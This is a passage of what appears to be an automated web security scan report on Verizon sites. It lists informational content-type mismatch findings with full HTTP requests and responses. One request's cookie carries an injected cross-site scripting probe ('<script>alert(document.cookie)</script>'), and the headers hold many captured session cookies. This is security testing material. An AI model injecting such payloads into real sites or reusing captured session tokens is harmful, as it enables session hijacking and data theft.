GET /m2/verizonwireless/mbox/standard?mboxHost=www.verizonwireless.com&mboxSession=1315278871714-190238&mboxPage=1315278871714-190238&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=853&browserTimeOffset=-300&colorDepth=16&mboxCount=2&loggedin=false&Hp=prospects&mbox=VZW_Global_Header&mboxId=0&mboxTime=1315260873834&mboxURL=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Findex.html&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: verizonwireless.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 172
Date: Mon, 05 Sep 2011 22:14:33 GMT
Server: Test & Target

mboxFactories.get('default').get('VZW_Global_Header',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315278871714-190238.19");

26.56. http://www.connecttoverizon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.connecttoverizon.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:19:18 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:19:18 GMT
Last-Modified: Thu, 27 Aug 2009 19:05:05 GMT
ETag: "3cc997-37e-4a96d8e1"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

26.57. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=site%3Averizon.com+ECSPCookies HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: StnTz5pY
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:30:33 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 16699

BfyINKgQ....S.......d..i...W.....1s#...site:verizon.com ECSPCookies.7$..5iU1lTvG3BKK0sQKszpnQCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"))))a=a.parentNode;return b||
...[SNIP]...

26.58. http://www.verizonbusiness.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /crossdomain.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/xml; charset=ISO-8859-1

The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /crossdomain.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.11.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "acc7f083353a5d96028f4e1a6ee9652a"
Last-Modified: Wed, 24 Nov 2010 20:41:29 GMT
Vary: Cookie, User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/xml; charset=ISO-8859-1
Content-Length: 475
Date: Mon, 05 Sep 2011 22:26:28 GMT
Connection: close

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="enterprisecenter.verizon.com" />
<allow-acce
...[SNIP]...

26.59. http://www.verizonbusiness.com/sitemap/tips.xml

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /sitemap/tips.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /sitemap/tips.xml?callback=searchtips&_=1315279044884 HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262200|VP%3d1|RMC%3dxg|LP%3den; __utma=58777642.1910521591.1315279004.1315279004.1315279004.1; __utmb=58777642.6.9.1315279041314; __utmc=58777642; __utmz=58777642.1315279004.1.1.utmcsr=www22.verizon.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:17:49 GMT
Vary: Cookie, User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "acd9627627407e5720803eb75fff05fb"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 41988
Date: Mon, 05 Sep 2011 22:17:49 GMT
Connection: close
Expires: Tue, 06 Sep 2011 00:17:47 GMT


searchtips={allpages: [{label: "Products", url:"/Products/", category:"Top Level"},
{label: "Solutions By Solutions", url:"/solutions/bysolutions/", category:"Top Level"},
{label: "Solutions By Need"
...[SNIP]...

26.60. http://www.verizonbusiness.com/templates/vzbar/bertprefs.json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/vzbar/bertprefs.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /templates/vzbar/bertprefs.json HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "85c726f186d020ffedbebbed8618305d"
Last-Modified: Mon, 05 Sep 2011 22:36:49 GMT
Content-Type: text/javascript
Content-Length: 15
Date: Mon, 05 Sep 2011 22:36:49 GMT
Connection: close
Cache-Control: no-cache="Set-Cookie"
Expires: Sun, 05 Sep 2010 16:36:49 GMT


({


});

26.61. http://www22.verizon.com/content/verizonglobalhome/gPromo.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www22.verizon.com
Path:   /content/verizonglobalhome/gPromo.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /content/verizonglobalhome/gPromo.aspx?getVal=1 HTTP/1.1
Host: www22.verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Cookie: ak-sf=false; __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1; ASP.NET_SessionId=ncxmtseom3hg3h4542cc0c55; GlobalSessionID=NEScwnwaL4QccG18LnT8IJ7HQ%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:13:38 PM; AkaUTrackingID=804E8C682B3FA4D861FA571CC854E9FD; AkaSTrackingID=22240856919E5F4D120128A4C01974E7; V347=3JqCYcsE1rlAhTfmCIUyRZ-iggeiohK6a-FKkJ_aMvvIaMkdz3Ks80g; hbxRet=Y; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ca45525d5f4f58455e445a4a423660; Product=A; ProductXML=A; canigetfios=Y; showpromo=N; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 21
Expires: Mon, 05 Sep 2011 22:14:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:14:29 GMT
Connection: close

,Y,FL;NY;PA,Y,807,,

26.62. http://www22.verizon.com/content/verizonglobalhome/setValues.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www22.verizon.com
Path:   /content/verizonglobalhome/setValues.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

POST /content/verizonglobalhome/setValues.aspx?getVal1=1 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Content-Length: 0
Origin: http://www22.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; hbxRet=Y; V347=0; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 72
Date: Mon, 05 Sep 2011 22:16:57 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:21:57 GMT; path=/content/; domain=verizon.com

hsi,High Speed Internet Without Phone,39.99*/?lid=//global//residential^

26.63. http://www22.verizon.com/foryourhome/MyAccount/Unprotected/common/dock_new.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www22.verizon.com
Path:   /foryourhome/MyAccount/Unprotected/common/dock_new.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /foryourhome/MyAccount/Unprotected/common/dock_new.aspx?mypage=Y HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; 
NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc65c45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA07V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 05 Sep 2011 22:41:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:41:49 GMT
Content-Length: 29486
Connection: close


document.write("<div id=\"placeholder\">    <div id=\"DivDLoad\" style=\"display:none\"><style type =\"text/css\"> /* Gray Curves */.GtopLnav, .GbottomLnav { display: block; backgro
...[SNIP]...

26.64. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/Images/truste_logo2.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /FORYOURSMALLBIZ/GOFLOW/Common/Images/truste_logo2.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /FORYOURSMALLBIZ/GOFLOW/Common/Images/truste_logo2.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; 
RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; refURL=https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V

Response

HTTP/1.0 200 OK
Content-Length: 2062
Content-Type: image/gif
Content-Location: http://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/Images/truste_logo2.gif
Last-Modified: Thu, 01 Sep 2011 17:51:50 GMT
Accept-Ranges: bytes
ETag: "03f55d3cf68cc1:6129"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:25:09 GMT
Connection: keep-alive

.PNG
.
...IHDR...t... ......[......PLTE........S..+VRS...37$......f.3..................fff.........KHJZu1........@.....o<H'** ..)........A.|~..    ?:;...K^*..3y.:........K..}...333........." ..c.1..f
...[SNIP]...

26.65. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_continueS.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_continueS.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_continueS.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; 